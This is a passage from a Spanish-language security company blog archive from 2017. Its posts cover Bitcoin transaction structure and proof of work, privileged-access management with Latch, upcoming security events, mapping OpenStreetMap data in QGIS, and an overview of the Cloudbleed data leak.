5 de abril de 2017
Blockchain (IV). Las entrañas de bitcoin. Transacciones, criptografía y ASICs
Pareciera que en realidad, todo esto de bitcoin y blockchain no fuese sino una suerte de artes de magia negra, vudú y pastafarismo… ¿Quién se aventuraría en conocer cuál es el funcionamiento interno del bitcoin de manera voluntaria? Pero por otro lado, dónde estaría la emoción de todo esto si no cacharreamos un poco y tratamos de entender cómo encajan por fin los engranajes. Entendamos un poco mejor qué mecanismos vinculan nuestros eWallets y qué ocurre con los BTCs en los grandes pools de minería. Para ello tenemos que entender cómo se crean y almacenan las transacciones y en qué consiste la prueba de trabajo, uno de los procesos más importantes del bitcoin. ¿Para qué quieres saber eso? Transacciones Nunca antes la expresión "mover el dinero" había cobrado más sentido que en bitcoin. Porque, en realidad… un individuo no posee BTCs, sino que únicamente tiene un recuento de las transacciones de BTCs que apuntan a su cartera. Incluso los mineros que han obtenido un premio por completar un bloque del blockchain reciben su incentivo gracias al envío de una transacción, con un origen vacío, hacia sus respectivas carteras. Por tanto, todo el conglomerado de bitcoins se basa en una ida y venida constante de criptomonedas transfiriéndose entre monederos virtuales. Cada transacción realizada en blockchain incluye, de manera muy simplificada: Entrada: Son referencias a otras transacciones anteriores. Si tenemos que realizar un pago de 5 BTCs al menos necesitamos referenciar una serie de transacciones que apunten a nuestra cartera y sumen al menos 5 BTCs. Dichas referencias se hacen utilizando el valor hash (SHA-256) de cada una de dichas transacciones. Cuerpo: Está formado por una clave pública y una firma digital. La clave pública se usa para garantizar que somos legítimos propietarios de las transacciones indicadas en la entrada. El cliente bitcoin (cartera) genera un hash de esta transacción de manera simplificada y utiliza la clave privada del usuario para obtener una firma digital basada en el algoritmo de curva elíptica (ECDSA). Gracias a que se adjunta la clave pública del propietario se podrá comprobar también la validez de esta firma y por tanto que el usuario actual es el legítimo usuario de esta transacción. Salida: Contiene el valor de BTCs a transferir y las direcciones donde serán transferidos. Cada una de esas direcciones es una eWallet distinta, cada una referenciada mediante un hash, que en realidad es la clave pública de esa cartera de destino. Como las transacciones que se usan como entradas son cantidades indivisibles, lo habitual es que la cantidad de BTCs en la entrada rara vez coincide con la que queremos enviar. Esto requiere un ajuste que veremos con un ejemplo: Supongamos que queremos transferir 5 BTCs a una cartera y la suma de BTCs a la entrada suman 7. Para remediarlo tendremos que incluir en la salida una referencia a nuestra propia cartera con esos BTCs que sobran. Pero además en una transacción habitual hay que tener en cuenta la comisión que tenemos que pagar al pool de minería que genera el bloque donde irá incluida esta transacción... Digamos que en este caso el pool solicita 0.1BTC. Por tanto en el listado de referencias a la salida tendríamos que indicar 1.9BTC a nuestra propia cartera y 0.1 a la del grupo de minería. Transacción de bitcoin La gran cantidad de transacciones que se generan a nivel mundial tienen que ser introducidas en el blockchain y para ello se buscó una estructura que por un lado permita establecer unas garantías matemáticas de consistencia e incorruptibilidad. Mientras que por el otro debe permitir una gestión ágil que permita un rápido procesamiento que no lastre la mecánica global de bitcoin. Así fue incorporado el árbol de Merkle como estructura organizativa de las transacciones, cumpliendo con estos requisitos. Árbol de Merkle Esta estructura diseñada por Ralph Merkle toma todas las transacciones (que deben ser una cantidad par) y las agrupa dos a dos, generando un hash SHA-256 por cada uno de estos grupos. Este conjunto de hashes se vuelve a agrupar de la misma forma generando nuevos hashes, así sucesivamente hasta llegar finalmente a un único valor hash conocido como la raíz del árbol o root hash. Visualmente esta estructura también conocida como árbol hash tiene forma de árbol binario equilibrado y completo, cuyas virtudes son: Cualquier modificación de una transacción modificará el hash de la hoja, por tanto, afectará a todos los hashes propagados e invalidará el valor de la raíz. Lo mismo ocurre si se añaden nuevas transacciones y hay que volver a generar el árbol de hashes. Toda la generación de hashes intermedios es despreciable, ya que a efectos prácticos solo nos interesa el último hash raíz. Hemos visto que este valor final es único y que está generado gracias a un proceso iterativo inmutable. Así que a efectos reales no necesitamos ocupar espacio de memoria para tener un valor que refleja la integridad de todas las transacciones. Una transacción o un millón generarán un root hash del mismo tamaño. Este proceso es verificable y reproducible, cualquier verificación que siga este proceso de agrupación y hashes alcanzará el mismo valor de la raíz. Árbol de Merkle Prueba de trabajo Una vez emitidas las transacciones e incorporadas a un bloque usando un árbol de Merkle, el pool de minería intentará confirmarlo. Dando comienzo al proceso más arduo y computacionalmente más complejo, pero "bien" recompensado. Como ya vimos en la anterior entrada, este proceso tarda de media 10 minutos y necesita hasta seis confirmaciones para que considere consensuada su incorporación. Esto permite un retraso lo suficientemente amplio para rechazar cualquier bloque con transacciones anómalas o introducidas fraudulentamente. Es decir, el propio proceso criptográfico consigue retrasar la producción de bloques y así los nodos validadores tienen tiempo suficiente para rechazar los bloques erróneos que se están intentando añadir al blockchain En bitcoin dicho esfuerzo recibe el nombre de Prueba de trabajo. Que no es sino un proceso de cálculo que realizan los mineros para obtener una cifra que sea inferior a un valor objetivo (un juego competitivo con condiciones autoimpuestas, en pocas palabras) utilizando para ello la función criptográfica SHA-256. Las consideraciones necesarias para entender este costoso cálculo son las siguientes El software del minero debe realizar una composición con la cabecera del bloque que pretende confirmar. Esta cabecera está compuesta de varios campos: El hash del bloque anterior, la raíz del árbol que contiene las transacciones del bloque, la versión de bloque, un timestamp, el valor objetivo buscado y un nonce. Un bloque con 10.000 transacciones se computa a la misma velocidad que uno con una única transacción al tener una arquitectura de árbol de merkle. Solo es necesario el root hash del árbol para tener garantías de la integridad y consistencia de las transacciones que formarán parte del bloque. El nonce es un valor de 4 bytes que el minero usa como contador. Dicho valor será incrementado durante el esfuerzo computacional mientras no se haya encontrado un valor correcto. A efectos prácticos es equiparable a una semilla que permitirá reajustar el cálculo de hashes hasta encontrar un valor dentro de los límites deseados. El timestamp cambia cada cierto número de segundos reiniciando por completo el cálculo computacional acumulado mediante el incremento del nonce. Teniendo que comenzar de nuevo. Cada cierto tiempo nuevas transacciones podrían ser añadidas al árbol (siempre que no exceda el tamaño del bloque) lo cual cambia su raíz y esto afecta a la composición de la cabecera del bloque. Una vez obtenida la cabecera del bloque, el software de minería realiza un doble SHA-256 para comprobar que el valor obtenido sea inferior al valor objetivo. Si este valor no es válido, se aumentará el contador nonce y se vuelve a intentar. Los motivos para usar un doble SHA-256 responde precisamente a reducir los riesgos de encontrar una colisión en dicho algoritmo como ocurrió recientemente con el SHA-1. Este algoritmo conocido como SHA256d fue propuesto por Ferguson y Schneier y varias alusiones han aparecido en el tiempo para justificar dicho uso desde el punto de vista de la seguridad. El valor objetivo se recalcula cada 2016 bloques confirmados, para corregirse de acuerdo a si es necesario aumentar la dificultad o reducirla según el tiempo medio de generación de bloques. Si se consiguen confirmar bloques rápidamente la dificultad aumentará, y se reducirá si resulta muy costoso encontrarlos. En la práctica esto se conoce como el número de ceros a la izquierda que debe tener el hash obtenido para saber si es válido o no. Este es el juego y la dificultad: ¿Quién calcula primero un hash añadiendo ciertas características y que además contenga un número de ceros a la izquierda predeterminado? Por tanto, cada pool de minería tratando de confirmar un bloque tiene un período de tiempo breve de unos segundos (bien por el timestamp o por la inclusión de nuevas transacciones) para realizar el SHA-256^2 de la cabecera del bloque, antes de que esta cabecera cambie y haya que reiniciar el nonce. Pero pese a todo este proceso tan dinámico y frustrante computacionalmente, cada comprobación realizada por la máquina tiene las mismas posibilidades de encontrar un hash por debajo del valor objetivo que el resto de nodos de la red. Simplemente aumentando el número de máquinas se puede aumentar las posibilidades de que el pool de minería consiga confirmar nuevos bloques. Tasa de Petahashes por segundo y la dificultad asociada del último año. Fuente: http://bitcoin.sipa.be No es de extrañar que, estimulados por la necesidad de aumentar el poder computacional, los pools de minerías pusieron su interés en equipos optimizados para el cálculo de hashes, operaciones de cifrado y de validación. Y como ha ocurrido en otros ámbitos computacionales este proceso padeció una continua evolución desde las CPUs, a las GPUS, de ahí a FPGAs y finalmente a los Application-specific integrated circuit (ASIC). Hoy por hoy con la dificultad impuesta para la minería de bitcoins las granjas de minado utilizan dicho hardware ASIC dedicado exclusivamente a la minería. Equipos con unas capacidades de cómputo de miles de Petahashes por segundo, y casi más importante aún con una eficiencia energética que optimiza el consumo eléctrico al mínimo. El minado de bitcoins se ha convertido en un oficio muy sectario y restringido solo para verdaderos interesados, pero como ya hemos dicho, estos mineros permiten que Bitcoin sea posible. Así que esperemos que gracias a sus beneficios "económicos" aún les resulte rentable mantener su contribución. En la siguiente entrada abordaremos el futuro que vislumbra el bitcoin y algunas de las consideraciones tecnológicas y económicas que le afectan, sentando algunas dudas y vislumbrando ciertos inconvenientes que podrían afectar al futuro de esta criptomoneda. *También te puede interesar: Blockchain (I): Más allá del Bitcoin, la Deep Web, el ransomware y la mala fama Blockchain (II). Un modelo distribuido fiable de seguridad. ¿La panacea? Blockchain III. Bitcoin. La criptomoneda precursora que abrió la caja de Pandora Marcos Arjona Innovación y laboratorio marcos.arjona@11paths.com
3 de abril de 2017
Soluciones de Gestión de Usuarios Privilegiados vitaminadas con Latch
Después de los dos artículos publicados en las semanas anteriores, donde se han definido conceptos de la gestión de accesos privilegiados, ventajas y usos. Ahora vamos a fortalecer (“vitaminar”) estas herramientas con la aplicación de Latch, nuestro cerrojo digital que nos proporciona una capa extra de seguridad. Si tuviéramos que implementar una solución PAM, tendríamos que aprovechar al máximo las funcionalidades de la propia herramienta de gestión de accesos privilegiados, consiguiendo una operativa más segura y eficiente. Nuestro planteamiento es la utilización de Latch, como un candado de la identidad digital, permitiendo o no la disponibilidad de esta, en las herramientas PAM. Actuando como un factor adicional y secuencial al acceso, pudiendo llegar a ser un doble factor en otras situaciones. Os mostraremos algunos casos de uso avanzado, con nuestra solución SMART PAM (Latch + PAM). En primer lugar, tendríamos el control de la gestión de cambios, considerando que en algunos momentos temporales tengamos la posibilidad de la “congelación de ciertos entornos” por razones de negocio (campañas de marketing, etc.), o por razones operativas, etc. Si aplicamos SMART PAM, integrando Latch de una forma "Multivaluada" en distintos sistemas o para distintos roles, generaremos escenarios avanzados de seguridad y control, difícilmente replicables en las soluciones de control de usuarios privilegiados. Imaginad que el CIO ó el director de Producción tienen cerrado Latch, no podremos acceder a la aplicación de gestión de usuarios privilegiados, y por tanto, no podremos realizar ningún tipo de cambio. En segundo lugar, tenemos la proliferación de distintas capas de organización de la seguridad en las corporaciones (CSO, CISO…), aplicado a la criticidad de los sistemas. Podríamos evitar la manipulación o acceso a los sistemas en casos de crisis o problemas de seguridad, como pudiera ser la realización de un análisis forense en los sistemas. Si aplicamos la "Multivaluación" de Latch cierta lógica externa en las aplicaciones PAM, podríamos cortar los accesos a los sistemas críticos, haciendo que en un caso de "ataque”, se bloqueen los accesos a través de las soluciones de “Privileged Access Management”, que deberían ser el único punto de acceso de los usuarios privilegiados. Debido a una vulnerabilidad, ataque, fuga de datos ... podemos hacer que los responsables de seguridad, puedan tomar la decisión de cerrar el acceso a los sistemas. Si el CISO, CSO o CEO creen oportuno asegurar el acceso a los sistemas, pueden hacerlo ágilmente desde su móvil, en los segundos posteriores a recibir una llamada de crisis. Si no aplicásemos nuestra solución SMART PAM, se demoraría las contramedidas adoptadas desde que disponemos de la información, hasta que se toman las decisiones oportunas, estando expuestos a riesgo durante unas horas adicionales. En este caso, podemos reducir el tiempo de exposición de una forma importante, mejorando la agilidad de la operación de una forma sencilla y probada. En tercer lugar, la compartición de las contraseñas. Donde reducimos drásticamente este uso con Latch en las soluciones PAM. Permitiendo balancear las premisas del administrador de sistemas/BBDD/Red, en cuanto a la operación sin olvidar la seguridad. Debido a esto, tenemos ciertos usuarios que son utilizados por varias personas. Aplicando Latch con un bloqueo tras un tiempo, disminuimos los riesgos de olvidos y aplicamos un segundo factor, reduciendo drásticamente los riesgos. En cuarto lugar y para concluir, describimos el caso de las aplicaciones donde hemos desarrollado una política de “cero administradores”, donde normalmente estará bloqueado el acceso por Latch, salvo en el caso que lo permita ágilmente nuestro “cerrojo” por un asunto de una contingencia. Con estos ejemplos de nuestra solución SMART PAM, pretendemos la visualización y la cercanía a las situaciones del día a día de las operaciones de tecnología, así como una propuesta de valor con tecnología propia donde nuestros clientes son dueños de su propia seguridad y de sus datos. Juan Carlos Vigo López CISA, CRISC, CGEIT, PMP, COBIT 5, Lean IT Product Manager at ElevenPaths *También te puede interesar: La importancia del control de las cuentas privilegiadas Cómo mejorar la seguridad de tu organización con soluciones PAM
30 de marzo de 2017
Eventos de ciberseguridad en abril que no te puedes perder
Si quieres estar al día sobre seguridad informática no puedes faltar a las citas que hemos seleccionado para ti. Aquí tienes la lista de actividades en las que participamos a lo largo del mes de abril, si coincide alguna de ellas en tu ciudad, acércate a conocernos. También hay eventos online, a los que puedes asistir estés donde estés. ¡Haz hueco en tu agenda! UMA HackersWeek IV Del 3 al 6 de abril se celebra en la Universidad de Málaga el evento para desarrolladores y apasionados de la seguridad informática, UMA HackersWeek IV. Durante estas jornadas participará Sergio de los Santos, responsable del área de Innovación y Laboratorio de ElevenPaths, impartiendo la charla " HPKP y HSTS: ¡Lo estáis haciendo mal!". También nuestro investigador José Torres forma parte del elenco de ponentes, con su charla " Macro Malware: From Russia with Love". ¡Un evento que no te puedes perder! ICAO Cyber Summit and Exhibition De 4 al 6 de abril se celebra en Dubai el evento que une aviación y seguridad, ICAO Cyber Summit and Exhibition. Nuestro compañero Sebastian García de Saint-Léger participará en dos workshops que se celebrarán durante el evento, dirigidos a explicar en profundidad diversos aspectos sobre ciberseguridad. ElevenPaths Talks Continúa nuestra serie de webinars online con los que podéis aprender, comentar y debatir con nuestros expertos sobre diversos temas relacionados con el hacking y la ciberseguridad. No te pierdas los webcasts que celebraremos en abril: 6 de abril. Quebrando Aplicaciones. Nuestros CSAs Pablo San Emeterio y Diego Espitia, junto a un invitado especial, mostrarán las vulnerabilidades e inseguridades de las aplicaciones móviles, así como lo que suponen en cuanto a identidad y privacidad. No te pierdas este interesante webinar. ¡Regístrate ahora! 20 de abril. Jugando con Apps de Mensajería. Conoce de la mano de nuestros expertos Gabriel Bergel y Claudio Caracciolo, junto a un invitado especial, los fallos de seguridad en apps de mensajería como WhatsApp, Telegram o Line, técnicas actuales de ataques y posibles soluciones ante estos. ¡Únete al Talk! A lo largo del año se celebrarán muchos más Talks, apúntate a las nuevas charlas de forma gratuita en nuestra web: talks.elevenpaths.com. Si quieres estar al tanto de esta interesante serie de webcasts síguelo en Twitter con el hashtag #11PathsTalks. También puedes charlar con los CSAs que imparten estos webinars en nuestra Community. ¡No pierdas esta oportunidad de aprender con los expertos! Si eres un amante de la seguridad informática no te puedes perder estas citas con otros profesionales y expertos del mundo de la ciberseguridad. ¡Estate atento! Síguenos en Twitter para estar informado de todo lo que sucede en ellas.
28 de marzo de 2017
Cómo explotar en tres pasos la información de OpenStreetMap
El proyecto OpenStreetMap nació con el objetivo de ofrecer a sus usuarios información geográfica de libre uso. Es decir, que fueran estos los que tuvieran el poder de añadir información, corregir errores o incluso integrar los mapas con otras herramientas pero sin pagar por ellos. Sin embargo, ¿nos hacemos a la idea de la cantidad de información útil que la gente comparte con la comunidad a cambio de nada? Lo mejor de todo es que solo necesitamos seguir tres pasos para poder explotarla. Primer paso. Descargar QGIS Para trabajar con este tipo de información utilizaremos QGIS. Un sistema de información geográfica (GIS) software libre que opera bajo la licencia GNU GPL y que se puede descargar aquí. Como cualquier GIS, se trabaja con capas de información superponiendo unas con otras. En nuestro caso, como queremos trabajar con los mapas de OpenStreetMap, tenemos que ir a Complementos > Administrar e instalar complementos y nos descargaremos el plugin OpenLayers. En ese momento se nos habrá habilitado en la pestaña web los mapas tanto de OpenStreetMap como de Google o de Bing. Figura 1. Capa de OpenStreetMap. Segundo paso. Selecciona una zona y descarga toda su información Una vez que tenemos el mapa de OpenStreetMap como capa y nos hemos situado sobre una zona concreta descargaremos la información que hay sobre ella. Para ello iremos a la pestaña Vectorial > OpenStreetMap > Descargar datos y se nos habrá generado un fichero de salida .osm. Figura 2. Descargar datos de OSM. Con el fichero .osm tendremos que ir a Vectorial > OpenStreetMap > Importar topología a partir de XML y se nos generará un fichero .osm.db. Asegúrate que la opción de crear conexión SpatiaLite se encuentra activada. Figura 3. Proceso de importación del fichero .osm. Y, por último, iremos a Vectorial > OpenStreetMap > Exportar topología a SpatiaLite. Este tipo de archivos contienen los tipos de características que tienen las bases de datos de OSM: puntos, polilíneas y polígonos. Seleccionaremos tipo puntos ya que la información que queremos representar se encuentra sobre una ubicación concreta y presionamos la opción Cargar de la base de datos. En este punto será cuando tendremos que seleccionar el tipo de información que queremos representar en el mapa. Por ejemplo, en mi caso, el objetivo es visualizar todos los objetos de tipo surveillance y de tipo atm, que la gente ha reportado, sobre la ciudad de Madrid. Figura 4. Proceso de exportación de la topología a SpatiaLite. Tercer paso. Categorizar la información En este último paso, duplicaremos la capa con el objetivo de que una represente los atm y la otra los objetos espaciales de tipo surveillance. Si presionamos botón derecho sobre cada una de las capas y nos dirigimos hasta la pestaña Estilo > Categorizado podremos visualizar cada tipo de objeto espacial de un color diferente. Figura 5. Proceso para categorizar la información representada. No os hemos mentido. Han sido tres pasos para poder representar aquella información compartida por la gente sobre una zona determinada. Sin embargo, los analistas deben tener en cuenta las limitaciones a las que se enfrentan, ya sea porque la información es incompleta o porque la información podría ser errónea. Pero, esperad un momento. Si se puede dar esta última hipótesis, ¿podría darse la posibilidad de que ciertos usuarios de OpenStreetMap añadieran información de forma intencionada con el objetivo de asociar un elemento geoespacial a alguna práctica ilegal para que terceros pudieran dar con ello? Yaiza Rubio Intelligence Analyst at ElevenPaths @yrubiosec
23 de marzo de 2017
ElevenPaths participa en la UMA HackersWeek IV
La semana del 3 de abril tendrá lugar en Málaga una nueva edición de la UMA Hackers Week, un evento gratuito y abierto al público para desarrolladores y apasionados de la seguridad informática, que se celebra como cada año en la Universidad de Málaga. Durante los días del 3 al 6 de abril se desarrollarán numerosas ponencias y talleres sobre nuevas tecnologías, programación y sobre todo seguridad informática. Las charlas, talleres, conferencias y coloquios reúnen tanto a profesionales del sector como a miembros de la comunidad. En sus cuatro ediciones han contado ya con ponentes de alto nivel de compañías como Google, Microsoft o Telefónica, entre otros. Este año, la cuarta edición de la conferencia contará además, con la presencia de dos de nuestros expertos de innovación y laboratorio en ElevenPaths, Sergio De los Santos y Jose Torres, que impartirán sus conferencias el día 3 de 11.00 a 12.00 horas. Sergio mostrará los entresijos de los mecanismos de seguridad HSTS y HPKP y los errores de implementación más comunes en servidores y navegadores en su ponencia "HSTS y HPKP: ¡Lo estáis haciendo mal!". En su turno, Jose expondrá la amenaza que aún supone el malware de macros, mostrando algunos ejemplos descubiertos en el laboratorio de ElevenPaths en su conferencia titulada "Macro malware. From Russia with Love".
20 de marzo de 2017
Cómo mejorar la seguridad de tu organización con soluciones PAM
Si no tienes una solución de control de usuarios privilegiados en tu organización, deberías plantearte por qué no dispones de ella. En el artículo anterior La importancia del control de las cuentas privilegiadas, os escribí lo que para mí es una de las principales soluciones en ciberseguridad en este 2017, me arriesgaría a decir que incluso hasta en 2019. Una solución que pretende cubrir la seguridad en un amplio número de tecnologías, y en la cual debería pensar cualquier organización que no disponga de controles de acceso a usuarios privilegiados. Bien es cierto que no cubre una seguridad de grano muy fino, no os voy a engañar, pero con ellas, podemos abarcar la seguridad de un gran número de tecnologías y alcanzar un nivel muy maduro de seguridad y control. Desplegando soluciones PAM Antes de ver posibles casos de usos que podemos llegar a cubrir, me gustaría indicaros cómo podríamos realizar el despliegue en tres grandes fases, las cuales deberíamos fijarnos como metas en relación a los usuarios privilegiados. Figura 1: Fases del despliegue de cuentas privilegiadas En una primera fase, deberíamos proteger las contraseñas de los usuarios privilegiados, intentando marcarnos el objetivo de llegar a un alto porcentaje de cuentas que no conozcan su contraseña, idealmente, rotando las mismas en cada uso. Dicho objetivo, es muy ambicioso, pero por eso, debemos marcarnos alcanzar o cubrir el mayor porcentaje posible. Una vez gestionadas las password a través de PAM, nuestra segunda fase, será el control de las distintas acciones que realizan los usuarios, al igual que antes, marcándonos metas ambiciosas, e intentando buscar el menor privilegio posible de los usuarios. Y, por último, y una fase que olvida muchas personas, es la monitorización continua. La misma nos servirá para detectar y controlar lo anteriormente implantado y nos marcará próximos puntos de control. Con estas fases, buscamos tratar los usuarios privilegiados de una forma transversal a los sistemas. Estamos acostumbrados a trabajar en monolitos, intentar cubrir una tecnología o ciertos sistemas de una forma más amplia, pero dejamos de lado otros puntos mucho más importantes. Ya no nos sirve cubrir la seguridad sólo de ciertos entornos, vivimos en el momento DevOps, debemos controlar cientos de despliegues de software a la semana, cada vez intentamos ser más agiles, nuestros administradores son multidisciplinares y lo mismo crean un filesystem que hacen un backup, y todo ello, orquestado por usuarios privilegiados, y es por esto que debemos empezar a tomar el control de la situación. Me gustaría comentaros ciertos beneficios de dichas soluciones, de una forma muy amplia, pero lo más importante, y donde realmente veremos el potencial de las soluciones PAM, es en algunos casos de usos específicos que os mostraré más adelante. Podemos garantizar el cumplimiento de las regulaciones mediante controles preventivos, de monitorización y correctivos, así como una auditoría de los controles y privilegios de acceso. Mejoraremos la productividad y experiencia del usuario al automatizar la gestión del acceso a cuentas privilegiadas y compartidas. Podremos establecer la cesión de cuentas mediante la aplicación de políticas para obtener acceso a las cuentas. Eliminaremos el riesgo de inicios de sesión anónimos a cuentas privilegiadas y compartidas. Impulsamos el principio de menor privilegio permitiendo el acceso a cuentas altamente privilegiadas sólo cuando sea necesario (éste es mi preferido). Proporcionaremos agilidad en el control de usuarios privilegiados. Casos de uso en soluciones PAM. Son múltiples los beneficios de las soluciones Privileged Access Management, y muchos de ellos difíciles de ver si no los aplicamos o situamos a casos de usos concretos. Hemos mencionado a los tan famosos DevOps, y me gustaría mostraros como convertir a los mismos en DevSecOps, como añadir control o una capa de seguridad a esta tan necesaria agilidad. En cada caso de uso, veremos con más detalle y mencionaré funcionalidades de las soluciones PAM. De DevOps a DevSecOps gracias a PAM Figura 2: DevSecOps gracias a Privileged Access Management Entendemos los DevOps, como aquellas personas que realizan desde el desarrollo (Dev), hasta su posterior operación (Ops), pero ello, no implica que deba hacerse con una única cuenta privilegiada. Si ya tenemos desarrollos desplegados, es posible que los mismos deban ser mantenidos, y que sea necesario una cuenta privilegiada, por ejemplo, para parar y arrancar instancias web productivas. Primer caso de uso, podemos hacer que un usuario, acceda a la cuenta privilegiada necesario en una franja horaria concreta, en la que únicamente pueda parar y arrancar la instancia necesaria, siendo controlado mediante políticas de seguridad. Ahora empecemos a exprimir todo el potencial, es posible que el usuario, necesite de más permisos o realizar otra operativa. Segundo caso de uso, autorización. Podemos hacer que el acceso, al salirse de la normalidad, sea aprobado por uno o varios responsables mediante la definición de Workflows, en la que, mediante autorización y políticas, el usuario tenga acceso a todo el directorio de la aplicación web. Pero es posible, y siempre tenemos que tenerlo en cuenta, incidencias o situaciones de crisis. Tercer caso de uso, control de las incidencias. Las incidencias, suelen ser reactivas, y por ello, no podemos depender de autorizadores, pero sí podemos tener un control del ciclo de accesos relacionado a incidentes. En la mayoría de empresas relacionadas con el mundo IT, se dispone de sistemas de Ticketing, los cuales debemos asegurarnos de vincular con las soluciones PAM. En nuestro caso, podemos dar acceso a una cuenta privilegiada con cierta libertad, si este está relacionado a un Ticket en un estado concreto, del que el Command Center tenga constancia, pudiendo así relacionar el acceso privilegiado a una incidencia. Continuamos nuestro desglose y seguimos con el despliegue de Software, palanca imprescindible en el mundo ágil. Cuarto caso de uso, A2A, Aplication to Aplication, en herramientas como Puppet, Clarive o similares, podemos erradicar cualquier tipo de usuario/password hardcodeado, gracias a pequeñas llamadas de código a las soluciones PAM, que devuelven la cuenta privilegiada, sin necesidad alguna de conocer las credenciales. Podríamos tratar más casos de usos, pero como veis, gracias a las soluciones PAM, podemos dar esa capa de Seguridad (Sec) tan necesaria en el día a día de los DevOps. Controlando nuestros datos y el Fraude gracias a PAM Figura 3: Control del fraude gracias a Privileged Access Management Para mí, el activo más importante de una empresa son sus datos. Datos y sistemas de explotación de los mismos que se han visto incrementados exponencialmente en los últimos años. La teoría nos indica que el control y la segregación de funciones debe realizarse en las distintas tecnologías, pero en la práctica, esto no es así. Nos hemos centrado en la calidad del dato, pero no en la seguridad del mismo. Quinto caso de uso. Controlando el fraude y qué hacemos en las Bases de Datos. Con algunas soluciones PAM podemos controlar las distintas Querys lanzadas por los usuarios, de forma que, por ejemplo, si un usuario lanza un Export, nos alerte nuestro sistema SIEM (un export no suele ser un comando operativo), o podemos aplicar dicha segregación que nunca se realiza, de forma que solo ciertos usuarios administradores de base de datos puedan borrar tablas. El control de la seguridad en bases de datos, o de nuestro BigData, es más fácil que nunca. Un control de los usuarios privilegiados, no solo nos reducirá el número de incidencias por descuido, sino que nos dará un punto extra de control sobre nuestros datos. Podríamos tratar multitud de casos de uso, pero terminaríamos con un inmenso post, mucho más aburrido de lo que ya es éste, por lo que, si tenéis dudas o casos de uso concretos, os animo a que os pongáis en contacto, estaremos encantados de ayudaros. Pero esto no es todo, en el próximo post “ Vitaminando las soluciones PAM con Latch”, veremos cómo tomar más control sobre nuestros usuarios privilegiados, viendo casos de uso que toda organización con un nivel de seguridad maduro debe plantearse, dando un valor añadido con la solución Latch. Rubén Gª Ramiro Telefónica Cybersecurity Expert Ciberseguridad Blog *También te puede interesar: La importancia del control de las cuentas privilegiadas
16 de marzo de 2017
Buenas y malas noticias sobre Cloudbleed
El viernes 17 de febrero el investigador de Google Tavis Ormandy realizaba una publicación en su cuenta de Twitter indicando la necesidad urgente de contactar con algún responsable de seguridad de la compañía Cloudflare. Tras ello, se inició una contrarreloj para intentar solventar un problema de seguridad a nivel mundial que podría estar permitiendo que la información privada de millones de direcciones web que tuviesen contratado este servicio estuviera siendo publicada en internet, llegando incluso a ser indexada por diferentes motores de búsqueda existentes. Dada la magnitud del incidente y el número de dominios potencialmente afectados fue apodado como «CloudBleed» mimetizando el nombre elegido para el incidente de SSL de 2014 denominado Hearthbleed. ¿Quién es CloudFlare y a qué se dedica? CloudFlare se describe en su portfolio de servicios como un proveedor enfocado en mejorar las páginas web de sus clientes desde el punto de vista del rendimiento, la seguridad y la fiabilidad. Creada en 2009, la compañía estadounidense tiene actualmente un valor de mercado superior a los mil millones de dólares dando servicio a más de cinco millones de clientes, los cuales podrían estar potencialmente afectados por este incidente. ¿Cómo, cuándo y por qué? La raíz del problema fue, según han publicado en su blog oficial, un cúmulo de sucesos que terminaron desencadenando un desbordamiento de buffer en un número aún indeterminado de peticiones a su servicio. Debido a este hecho, fueron publicados datos privados no cuantificados que van desde cookies HTTP, hasta cuerpos de peticiones POST (donde se podrían llegar a ver expuestas las contraseñas o tokens de autenticación) entre otros datos, con la particularidad añadida de que parte de ellos además pudieron ser capturados por los principales motores de búsqueda existentes. Uno de los procesos responsable del desbordamiento fue un procedimiento encargado de parsear los ficheros HTML de las páginas web de sus clientes. Estas funciones desarrolladas por la compañía son necesarias para poder dotar a sus usuarios de una capa de seguridad extra como la reescritura de páginas HTTP a HTTPS o la ofuscación de correos electrónicos, así como el ofrecimiento de distintas mejoras desde el punto de vista estadístico mediante la inserción de etiquetas de Google Analytics. Aunque estos parseadores estaban funcionando desde hace años, el problema se habría desencadenado a partir del 22 de septiembre de 2016, cuando a raíz de una actualización de la tecnología utilizada por su parser, fue habilitado de manera automática un nuevo módulo de reescritura del código HTTP. Según describen en el blog, este fallo de desbordamiento no estaría afectando a la totalidad de sus clientes, sino que también debía estar condicionado por un fallo de programación en las páginas web, ya que para que los ficheros no fueran procesados correctamente y los punteros accedieran a posiciones de memoria no deseadas era necesario que las etiquetas del código HTML estuvieran mal construidas. Según las estadísticas reportadas por la compañía esta casuística ocurrió en el 0,06% de las páginas web. Impacto y alcance del incidente Para poder entender un poco el alcance real del problema, Cloudflare realizó una publicación adicional el 1 de marzo donde muestra una evolución de cómo se fue desarrollando el incidente, separado en dos periodos de tiempo delimitados. Desde el 22 de septiembre de 2016 hasta el 13 de febrero de 2017 únicamente se habrían visto afectados 180 sitios y las cifras oficiales estiman que el fallo se desencadenó 605 037 veces. Desde el 13 de febrero al 18 de febrero de 2017 el número de sitios afectados habría ascendido hasta los 6457 lo que provocó la ejecución del fallo otras 637 034 ocasiones, más que en los cuatro meses y medio anteriores. En el momento de mayor exposición, el fallo se habría llegado a disparar en 1 de cada 3,3 millones de peticiones es decir en un 0,00003% de las solicitudes. Según sus estimaciones, el número total de veces que pudo ser ejecutado el fallo ascendería a 1 242 071, aunque las estimaciones hablan de que aproximadamente el 50% de ellas habrían sido realizadas por los propios crawlers de los principales motores de búsqueda. De esta descripción se infiere que las direcciones web que tuvieran un mayor número de consultas o que fueran más populares se podrían haber visto afectadas con más facilidad. Pese a ello, el problema aún persiste en algunas páginas dedicadas a la captura de direcciones web para la creación de bibliotecas digitales, ya que como se observa en esta captura de archive.fo, la información expuesta por CloudFlare estaría todavía disponible para ser consultada por cualquier usuario de internet. Ilustración 1. Captura de pantalla de una cabecera de Cloudflare insertada en una web afectada por el incidente de «CloudBleed». ¿Como podría ser utilizado? Pero, ¿cómo podría haber sido utilizado por un atacante que conociera esta vulnerabilidad desde septiembre de 2016? Su explotación es compleja, ya que la opción más viable sería la de realizar un número muy elevado de peticiones para intentar que se produjera el desbordamiento el mayor número de veces posible. Esta posibilidad fue barajada por el equipo de Cloudflare y procedieron al análisis de diversos patrones de comportamiento para la detección de tráfico inusual, así como la reproducción del incidente en sus laboratorios donde a priori no existen evidencias de que el fallo haya sido explotado por parte de terceros actores. Conclusiones La problemática existente en este tipo de incidentes es compleja, ya que la compañía ha intentado obrar de una forma transparente informando acerca de lo ocurrido facilitando información como tiempos de respuesta calculados al minuto. La estrecha colaboración mantenida con los principales motores de búsqueda para la eliminación de las más de 80 000 páginas con información de Cloudflare cacheada en sus direcciones ha sido fundamental para poder mitigar las consecuencias del incidente cuanto antes poniendo sobre la mesa la importancia de la colaboración entre distintos organismos cuando tienen lugar este tipo de incidentes. Algunas plataformas que hacían 